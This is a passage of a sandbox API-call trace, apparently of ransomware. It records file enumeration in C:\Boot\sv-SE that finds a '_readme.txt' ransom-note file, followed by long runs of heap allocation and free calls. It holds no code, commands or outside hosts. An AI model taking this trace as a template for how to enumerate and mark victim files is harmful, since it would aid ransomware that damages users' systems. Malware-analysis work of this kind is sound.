dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.250] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned=".txt" [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.251] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.251] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.251] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.251] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, 